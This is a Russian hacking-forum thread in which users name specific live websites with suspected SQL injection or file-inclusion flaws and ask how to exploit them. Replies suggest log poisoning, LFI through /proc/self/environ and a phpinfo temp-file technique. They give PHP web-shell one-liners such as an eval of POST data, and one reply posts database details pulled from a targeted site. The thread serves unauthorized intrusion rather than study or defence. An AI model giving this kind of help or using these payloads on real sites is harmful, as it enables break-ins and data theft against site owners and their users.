Ваши вопросы по уязвимостям.

Обсуждение в разделе «Уязвимости», начал(-а) +, 27.04.2015.

  1. +
    Предыдущая тема там -> http://forum.antichat.ru/threads/46016/



    В этой и только в этой теме вы можете задать вопрос про способ заливки шелла, детальные разборки xss и sql на конкретных сайтах, не построенных на паблик движках (для остального есть поиск по форуму).

    Все остальные вновь созданные темы по данным вопросам будут удаляться. Создавайте темы, если вы хотите поделиться уязвимостью или нашли что-то новое и интересное в публичном двиге и хотите, чтобы вам помогли это разобрать.

    Задавать вопросы, ответы на которые с легкостью можно найти в многочисленных мануалах и статьях, вести личную переписку крайне не рекомендуется.

    Задавайте полный, четкий и внятный вопрос, который включает в себя описание найденной вами уязвимости, методы и способы, с помощью которых вы пытались ее проэксплуатировать, какие преграды при этом встретили.

    ЛОГИНЫ И ПАРОЛИ ПОСТИТЬ В ОТКРЫТОМ ВИДЕ ЗАПРЕЩЕНО
     
    #1 +, 27.04.2015
    В последний раз редактировалось модератором: 21.05.2015
    Это одобряют yarbabin и UXOR.
  2. Br@!ns

    [email protected]!ns Elder - Старейшина

    Регистрация:
    3.09.2010
    Сообщения:
    972
    Одобрения:
    118
    Репутация:
    25
    Code:
    http://tn.tomsk.ru/tv/index.php?day=2015-04-05&dt=&ch=1140
    Можно что нибудь заинклудить тут? :)
     
  3. yarbabin

    yarbabin HACKIN YO KUT

    Регистрация:
    21.11.2007
    Сообщения:
    1 680
    Одобрения:
    877
    Репутация:
    363
    там не инкулд, там file_get_contents, а он читает содержимое файла в строку. но нет, прочитать тоже не выйдет, потому что у нас префикс в виде
    Code:
    http://tv.mail.ru/print_p.html
     
    _________________________
    Это одобряет [email protected]!ns.
  4. Br@!ns

    [email protected]!ns Elder - Старейшина

    Регистрация:
    3.09.2010
    Сообщения:
    972
    Одобрения:
    118
    Репутация:
    25
    Code:
    http://compassrecords.com/cart.php?action=add&id=4537%27
    Помогите с выводом раскрутить
     
  5. er9j6@

    [email protected] Elder - Старейшина

    Регистрация:
    17.09.2011
    Сообщения:
    410
    Одобрения:
    40
    Репутация:
    23

    5.5.42-cll:[email protected]:compass_compass09:Linux
     
    Это одобряет [email protected]!ns.
  6. sunnyfruit

    sunnyfruit Banned

    Регистрация:
    8.05.2013
    Сообщения:
    20
    Одобрения:
    2
    Репутация:
    0
    Парни, есть LFI на сайте, который позволяет читать /proc/self/environ
    Ставлю в User-Agent простейший php код -сайт отдает 400 ошибку.
    Что сделать можно?
     
  7. yarbabin

    yarbabin HACKIN YO KUT

    Регистрация:
    21.11.2007
    Сообщения:
    1 680
    Одобрения:
    877
    Репутация:
    363
    через еррор_лог или ацес_лог пробовали?
     
    _________________________
  8. sunnyfruit

    sunnyfruit Banned

    Регистрация:
    8.05.2013
    Сообщения:
    20
    Одобрения:
    2
    Репутация:
    0
    /proc/self/environ
    Через логи не пробовал.
    Проканало когда я закодировал в base64 и отдал код как куки - енвайров их тоже читает
    получилось что то типа eval(base64_decode($shell_str))
    Нельзя как то по эстетичнее?
     
  9. yarbabin

    yarbabin HACKIN YO KUT

    Регистрация:
    21.11.2007
    Сообщения:
    1 680
    Одобрения:
    877
    Репутация:
    363
    а зачем вам эстетика? лейте полноценный шелл и все. этот вариант тоже вполне эстетичный. не все сводится к <?eval($_POST[a]);?>
     
    _________________________
    Это одобряет Mister_Bert0ni.
  10. sunnyfruit

    sunnyfruit Banned

    Регистрация:
    8.05.2013
    Сообщения:
    20
    Одобрения:
    2
    Репутация:
    0
    tvnetcitoyenne.com/journal.php?article=Тут_Инклуд_Проходит&phpsessid=98e322270e7ed6ec12ff0d0e9b66cf2a
    Я не пойму как он фильтрует Юзер-Агент
     
  11. sunnyfruit

    sunnyfruit Banned

    Регистрация:
    8.05.2013
    Сообщения:
    20
    Одобрения:
    2
    Репутация:
    0
    не проходит даже <?php echo 1;?>
     
  12. Br@!ns

    [email protected]!ns Elder - Старейшина

    Регистрация:
    3.09.2010
    Сообщения:
    972
    Одобрения:
    118
    Репутация:
    25
  13. AndreyBerkut

    AndreyBerkut New Member

    Регистрация:
    16.12.2013
    Сообщения:
    8
    Одобрения:
    0
    Репутация:
    0
    http://store.1001host.ru/get/25'/3238264cd17791854de5
    Кто подскажет, как раскрутить? Всё перепробовал... Готов заплатить за помощь.
     
  14. MaxFast

    MaxFast Elder - Старейшина

    Регистрация:
    12.10.2011
    Сообщения:
    623
    Одобрения:
    147
    Репутация:
    94
    А вы уверены что там есть инъекция?
     
  15. OxoTnik

    OxoTnik На мышей

    Регистрация:
    10.06.2011
    Сообщения:
    1 095
    Одобрения:
    507
    Репутация:
    173
  16. sunnyfruit

    sunnyfruit Banned

    Регистрация:
    8.05.2013
    Сообщения:
    20
    Одобрения:
    2
    Репутация:
    0
    faza02, ты мне скидывал сплойт
    https://rdot.org/forum/showpost.php?p=18024&postcount=11
    Я разобрал заголовки и у меня получился файл на 40 мб.
    https://www.sendspace.com/file/7vxeod
    Не пойму где передается имя временного файла.
    Ответ сервера всегда одинаковый:
    То есть нигде имя временного файла не передается. Что не так?
     
  17. yarbabin

    yarbabin HACKIN YO KUT

    Регистрация:
    21.11.2007
    Сообщения:
    1 680
    Одобрения:
    877
    Репутация:
    363
    имя
    имя временного файла в есть в phpinfo();
    вот строка из сплоента:
    Code:
    if ($line =~ m#tmp_name].+(/tmp/php.+)$#) {
     
    _________________________
  18. sunnyfruit

    sunnyfruit Banned

    Регистрация:
    8.05.2013
    Сообщения:
    20
    Одобрения:
    2
    Репутация:
    0
    Пробовал тут:
    https://autopaymentfinder.com/phpinfo.php
    И на тестовом сайте денвера файл с phpinfo.
    Тоже-самое
     
  19. Xsite

    Xsite New Member

    Регистрация:
    21.01.2010
    Сообщения:
    36
    Одобрения:
    4
    Репутация:
    0
    Ребят подскажите пожалуйста

    Расковырял скулю ,меп выдает

    [16:45:55] [INFO] the back-end DBMS is Microsoft SQL Server
    web application technology: ColdFusion
    back-end DBMS: Microsoft SQL Server 2008

    И находит 20+ бд

    При этом ,при запросе таблиц от туда ,выходит месага

    [16:46:42] [WARNING] the SQL query provided does not return any output
    [16:46:43] [WARNING] the SQL query provided does not return any output
    [16:46:44] [WARNING] the SQL query provided does not return any output
    [16:46:45] [WARNING] the SQL query provided does not return any output
    [16:46:46] [WARNING] the SQL query provided does not return any output
    [16:46:47] [WARNING] the SQL query provided does not return any output

    Тобишь ,ни одну бд он не открыл .

    Есть способы обхода ?
     
  20. yarbabin

    yarbabin HACKIN YO KUT

    Регистрация:
    21.11.2007
    Сообщения:
    1 680
    Одобрения:
    877
    Репутация:
    363
    какие пути обхода? обход чего? кто должен угадывать, почему нет вывода?
    пишите сюда запросы, ошибки и все, что может пригодится для того, чтобы не угадывать, в чем у вас проблема
     
    _________________________
    Это одобряет Chris.
Загрузка...
Similar Threads - вопросы уязвимостям
  1. brand29
    Ответы:
    1
    Просмотры:
    1 200
  2. Yandex
    Ответы:
    15
    Просмотры:
    2 548
  3. Omgg
    Ответы:
    9
    Просмотры:
    1 919
  4. sinij1
    Ответы:
    12
    Просмотры:
    2 228